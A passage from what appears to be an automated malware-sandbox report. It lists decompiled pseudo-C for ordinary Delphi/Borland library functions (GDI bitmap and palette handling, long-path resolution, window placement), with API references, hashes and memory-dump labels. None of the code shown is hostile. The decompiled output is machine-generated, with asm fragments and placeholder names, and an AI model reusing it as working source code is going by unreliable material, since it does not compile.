										_t441 =  &(_v40->bmiColors);
										E004029BC(_a8 + 0x40, 0xc, _t441);
									}
								} else {
									_t441 = _a8;
									if(_t229 == 0x20) {
										goto L30;
									}
								}
							} else {
								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
									if(_v16 == 0) {
										if(_v8 != 0) {
											_v24 = SelectObject(_v32, _v8);
											if(_v116 <= 0 || _v120 == 0) {
												asm("cdq");
												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
											} else {
												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
												_t441 = _a8;
												 *(_t441 + 0x38) = _t281;
											}
											SelectObject(_v32, _v24);
										}
									} else {
										_t441 =  &(_v40->bmiColors);
										E00421290(_v16, 0xff, _t441);
									}
								} else {
									_t441 = 0;
									_v40->bmiColors = 0;
									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
								}
							}
							_v20 = E00420AFC(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
							if(_v44 == 0) {
								E00420A54(_t419);
							}
							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
								_pop(_t442);
								 *[fs:eax] = _t442;
								_push(0x423d2b);
								return E00402774(_v40);
							} else {
								asm("cdq");
								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
								E00403E54();
								E00403E54();
								goto L61;
							}
						} else {
							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
								_v20 = E00420AFC(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
							} else {
								_v20 = E00420AFC(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
							}
							E00420AFC(_v20);
							_v24 = E00420AFC(SelectObject(_v32, _v20));
							_push(_t457);
							_push(0x423fcb);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_push(_t457);
							_push(0x423fba);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_v56 = 0;
							_t422 = 0;
							if(_v16 != 0) {
								_v56 = SelectPalette(_v32, _v16, 0);
								RealizePalette(_v32);
							}
							_push(_t457);
							_push(0x423f98);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							if(_a4 == 0) {
								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
							} else {
								_t366 = E0041FC20( *((intOrPtr*)(_a4 + 0x14)));
								E00412B80( *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
								FillRect(_v32,  &_v156, _t366);
								SetTextColor(_v32, E0041EF40( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
								SetBkColor(_v32, E0041EF40(E0041FBE4( *((intOrPtr*)(_a4 + 0x14)))));
								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
									_v52 = E0041EF40( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
									_v48 = E0041EF40(E0041FBE4( *((intOrPtr*)(_a4 + 0x14))));
									SetDIBColorTable(_v32, 0, 2,  &_v52);
								}
							}
							if(_v8 == 0) {
								_pop(_t444);
								 *[fs:eax] = _t444;
								_push(E00423F9F);
								if(_v16 != 0) {
									return SelectPalette(_v32, _v56, 0xffffffff);
								}
								return 0;
							} else {
								_v36 = E00420AFC(CreateCompatibleDC(_v28));
								_push(_t457);
								_push(0x423f6e);
								_push( *[fs:eax]);
								 *[fs:eax] = _t460;
								_t455 = E00420AFC(SelectObject(_v36, _v8));
								if(_v12 != 0) {
									_t422 = SelectPalette(_v36, _v12, 0);
									RealizePalette(_v36);
								}
								if(_a4 != 0) {
									SetTextColor(_v36, E0041EF40( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
									SetBkColor(_v36, E0041EF40(E0041FBE4( *((intOrPtr*)(_a4 + 0x14)))));
								}
								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
								if(_v12 != 0) {
									SelectPalette(_v36, _t422, 0xffffffff);
								}
								E00420AFC(SelectObject(_v36, _t455));
								_pop(_t445);
								 *[fs:eax] = _t445;
								_push(0x423f75);
								return DeleteDC(_v36);
							}
						}
					} else {
						goto L61;
					}
				} else {
					L61:
					return _v20;
				}
			}

0x004239cd
0x004239cf
0x004239d5
0x004239d8
0x004239db
0x004239de
0x004239e3
0x004239ed
0x00423a10
0x00423a2f
0x00423a36
0x00423a3d
0x00423a56
0x00423a56
0x00423a67
0x00423a78
0x00423a7d
0x00423a7e
0x00423a83
0x00423a86
0x00423a90
0x00423afa
0x00423aff
0x00423b00
0x00423b05
0x00423b08
0x00423b0e
0x00423b18
0x00423b26
0x00423b2e
0x00423b3b
0x00423b40
0x00423b47
0x00423b47
0x00423b51
0x00423b5b
0x00423b66
0x00423b6f
0x00423b72
0x00423b7d
0x00423c4d
0x00423c55
0x00423c60
0x00423c67
0x00423c6c
0x00423c74
0x00423c82
0x00423c82
0x00423c57
0x00423c57
0x00423c5e
0x00000000
0x00000000
0x00423c5e
0x00423b83
0x00423b8b
0x00423bb9
0x00423bd7
0x00423bea
0x00423bf1
0x00423c26
0x00423c36
0x00423bf9
0x00423c0b
0x00423c10
0x00423c13
0x00423c13
0x00423c43
0x00423c43
0x00423bbb
0x00423bbe
0x00423bc9
0x00423bc9
0x00423b99
0x00423b9c
0x00423b9e
0x00423baa
0x00423baa
0x00423b8b
0x00423ca3
0x00423caa
0x00423cac
0x00423cac
0x00423cb5
0x00423d10
0x00423d13
0x00423d16
0x00423d23
0x00423cda
0x00423cea
0x00423cfa
0x00423cff
0x00423d04
0x00000000
0x00423d04
0x00423a92
0x00423aa4
0x00423ae8
0x00423aa6
0x00423ac4
0x00423ac4
0x00423d2e
0x00423d45
0x00423d4a
0x00423d4b
0x00423d50
0x00423d53
0x00423d58
0x00423d59
0x00423d5e
0x00423d61
0x00423d66
0x00423d69
0x00423d6f
0x00423d80
0x00423d87
0x00423d87
0x00423d8e
0x00423d8f
0x00423d94
0x00423d97
0x00423d9e
0x00423e74
0x00423da4
0x00423daa
0x00423dc8
0x00423dd8
0x00423df0
0x00423e0a
0x00423e17
0x00423e30
0x00423e43
0x00423e52
0x00423e52
0x00423e17
0x00423e7d
0x00423f77
0x00423f7a
0x00423f7d
0x00423f86
0x00000000
0x00423f92
0x00423f97
0x00423e83
0x00423e91
0x00423e96
0x00423e97
0x00423e9c
0x00423e9f
0x00423eb4
0x00423eba
0x00423ecb
0x00423ed1
0x00423ed1
0x00423eda
0x00423eef
0x00423f09
0x00423f09
0x00423f31
0x00423f3a
0x00423f43
0x00423f43
0x00423f52
0x00423f59
0x00423f5c
0x00423f5f
0x00423f6d
0x00423f6d
0x00423e7d
0x00000000
0x00000000
0x00000000
0x00424021
0x00424021
0x0042402a
0x0042402a

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 00423A4C
GetDC.USER32(00000000), ref: 00423A5D
CreateCompatibleDC.GDI32(00000000), ref: 00423A6E
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00423ABA
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00423ADE
SelectObject.GDI32(00000000,?), ref: 00423D3B
SelectPalette.GDI32(00000000,00000000,00000000), ref: 00423D7B
RealizePalette.GDI32(00000000), ref: 00423D87
SetTextColor.GDI32(00000000,00000000), ref: 00423DF0
SetBkColor.GDI32(00000000,00000000), ref: 00423E0A
SetDIBColorTable.GDI32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00423F98,?,00000000,00423FBA), ref: 00423E52
FillRect.USER32 ref: 00423DD8

Part of subcall function 0041EF40: GetSysColor.USER32(?), ref: 0041EF4A

PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 00423E74
CreateCompatibleDC.GDI32(00000000), ref: 00423E87
SelectObject.GDI32(?,00000000), ref: 00423EAA
SelectPalette.GDI32(?,00000000,00000000), ref: 00423EC6
RealizePalette.GDI32(?), ref: 00423ED1
SetTextColor.GDI32(?,00000000), ref: 00423EEF
SetBkColor.GDI32(?,00000000), ref: 00423F09
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423F31
SelectPalette.GDI32(?,00000000,000000FF), ref: 00423F43
SelectObject.GDI32(?,00000000), ref: 00423F4D
DeleteDC.GDI32(?), ref: 00423F68

Part of subcall function 0041FC20: CreateBrushIndirect.GDI32(?), ref: 0041FCCA

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
String ID:
API String ID: 1299887459-0
Opcode ID: 0dad1579fcc68423ab24e5695ce4f38d82b1f9ee927cb46af67c7f953004088e
Instruction ID: cb774c8826aa88ad688945fa0f3bcce2e6246f4dfe93b2bcb999cc835fa2f1f9
Opcode Fuzzy Hash: 0dad1579fcc68423ab24e5695ce4f38d82b1f9ee927cb46af67c7f953004088e
Instruction Fuzzy Hash: 51120D75A00218AFDB00EFA9D985F9E77F8EB08315F518456F914EB291C778EE80CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00405AE8, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405AE8(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00405AD4(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00405AD4(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401338();
									while( *_t93 != 0) {
										_t90 = E00405AD4(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401338();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401340();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401338();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401340();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401338();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401338();
						}
					}
				}
				L17:
				return _v16;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0047608C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405B05
GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405B16
lstrcpyn.KERNEL32(?,?,?,?,00000001,0047608C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B46
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0047608C,?,00405D48,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405BAA
lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047608C,?,00405D48,00000000,00405DA5,?,80000001), ref: 00405BDF
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047608C,?,00405D48,00000000,00405DA5), ref: 00405BF2
FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047608C,?,00405D48,00000000), ref: 00405BFF
lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0047608C,?,00405D48), ref: 00405C0B
lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C3F
lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C4B
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C6D

Strings

kernel32.dll, xrefs: 00405B00
\, xrefs: 00405C1D
GetLongPathNameA, xrefs: 00405B10

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
Instruction ID: 73109fc7617de6927649651d2e73acf26c869defa74ee943d75a78e36df64a33
Opcode Fuzzy Hash: a0ca131dc62e861f4fed9098179ba15cf9d3b55e4a629aaab9a90f7636454dfe
Instruction Fuzzy Hash: D441837190465CABEB10EAA8CC85EDFB7ECDF05304F1401B6B949F7291D678AE408F58

Uniqueness

Uniqueness Score: -1.00%

Function 0045194C, Relevance: 18.4, APIs: 12, Instructions: 407
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0045194C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x451eb6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
					_t294 =  *0x49128c; // 0x41d528
					E00406548(_t294,  &_v12);
					E0040A158(_v12, 1);
					E00403DA8();
				}
				_t149 =  *0x492c04; // 0x2210d40
				E00455F24(_t149);
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
				_push(_t372);
				_push(0x451e99);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x451da0);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037D8(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x492c08; // 0x221094c
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E00450B38(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0043C1F4(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0043C1F4(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E0044C778(E0043C1F4(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0043C1F4(_v8), 0);
								} else {
									SetWindowPos(E0043C1F4(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0043C1F4(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E00439870(_v8);
						}
					} else {
						_push(_t372);
						_push(0x451a04);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037D8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E0045317C() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E00453170() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x492c04; // 0x2210d40
								_t305 = E00435578( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x492c04; // 0x2210d40
								_t248 = E004355BC( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E0044FDEC(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E004531AC() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E004531A0() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x492c04; // 0x2210d40
										_t311 = E00435578( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x492c04; // 0x2210d40
										_t269 = E004355BC( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x492c04; // 0x2210d40
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44b108; // 0x44b154
									_t290 = E00403768( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E0045317C() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E00453170() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E0044FDEC(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0043C1F4(_v8),  *(0x476bc8 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0043C1F4(_v8),  *(0x476bc8 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x406d84, E0043C1F4(_v8), 5, 0, _t220);
								E00435DD4();
							} else {
								_t231 = E0043C1F4(_v8);
								_t232 =  *0x492c04; // 0x2210d40
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E0043C1F4(_v8), 3);
							}
							_t226 =  *0x492c04; // 0x2210d40
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x451ea0);
				_t154 = _v8;
				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
				return _t154;
			}

APIs

SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00451CCD

Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadMessageSendString
String ID:
API String ID: 1946433856-0
Opcode ID: b04be16a98f3b84a1d84bbe9ae8db85398f7ce53e1604c2673c01cbf06150d9f
Instruction ID: 300ddb75549afbc40e5faef4ff068dcdb6cfc4397da42f21fc66367e2d171d31
Opcode Fuzzy Hash: b04be16a98f3b84a1d84bbe9ae8db85398f7ce53e1604c2673c01cbf06150d9f
Instruction Fuzzy Hash: 1BF15D30A04244EFDB01DBA9C9C5B9E77F5AB08305F2541B6E900AB363D779EE45DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0043C504, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0043C504(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E004351C8(_t43);
			}

APIs

IsIconic.USER32 ref: 0043C513
GetWindowPlacement.USER32(?,0000002C), ref: 0043C530
GetWindowRect.USER32 ref: 0043C549
GetWindowLongA.USER32 ref: 0043C557
GetWindowLongA.USER32 ref: 0043C56C
ScreenToClient.USER32 ref: 0043C579
ScreenToClient.USER32 ref: 0043C584

Strings

,, xrefs: 0043C51C

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: d3978e29b4011b20706598392c25bbde71e925f744e67a7bf9976fb6df8bed74
Instruction ID: 813972987c9af47017c6e8c0ff2830ba60c29583813e2a484c0d43f261c6bbd2
Opcode Fuzzy Hash: d3978e29b4011b20706598392c25bbde71e925f744e67a7bf9976fb6df8bed74
Instruction Fuzzy Hash: 4D117F71504211ABCB01DF6DC885A9B77D8AF0D314F14462EFE58EB386D739E9048BA6

Uniqueness

Uniqueness Score: -1.00%

Function 004493A0, Relevance: 10.9, APIs: 7, Instructions: 405
nativeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E004493A0(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				struct HWND__* _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
